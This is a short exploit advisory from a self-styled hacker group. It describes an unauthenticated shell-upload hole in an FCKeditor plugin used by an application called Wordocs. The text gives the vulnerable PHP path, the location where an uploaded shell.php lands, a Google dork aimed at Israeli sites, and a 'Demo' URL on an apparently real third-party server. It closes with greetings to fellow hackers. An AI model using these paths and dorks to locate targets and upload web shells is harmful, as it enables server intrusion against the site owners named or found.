---------------------------------------------------------------- Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities ---------------------------------------------------------------- # Exploit Title: Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities # Google Dork: inurl:/files/wordocs/ site:il # Application Name: [Wordocs Israel] # Date: 2012-09-04 # Author: BHG Security Center # Home: http://cc.black-hg.org - http://greyh4t.com/cc/ # Version: [ 0.4.1.16 ] # Impact : [ High ] # Tested on: [linux+apache] # CVE : Webapps # Finder(s): - Net.Edit0r (Net.Edit0r [at] att [dot] net) # Note: Please note there is a vulnerability in the site of non-Israeli # Description: : You can directly upload your shellcode and use server +-----------------------+ | Shellcode Upload | +-----------------------+ The vulnerable code is located in /FCKeditor/editor/plugins/uploadme/fck_uploadme.php Proof of Concept: ----------------- ~ PoC : http://localhost/FCKeditor/editor/plugins/uploadme/fck_uploadme.php ~ File upload path : http://[Target]/files/wordocs/shell.php ~~~~~~~~ Demo : http://facet-theory.org/FCKeditor/editor/plugins/uploadme/fck_uploadme.php ~ Study of Vulnerability : http://www.mediafire.com/?qedv4dq6b4yfqcz [-] Disclosure timeline: [04/08/2011] - Vulnerabilities discovered [14/10/2011] - Others vulnerabilities discovered [15/10/2011] - Issues reported to http://black-hg.org [04/09/2012] - Public disclosure # Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t ~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf ===========================================[End]=============================================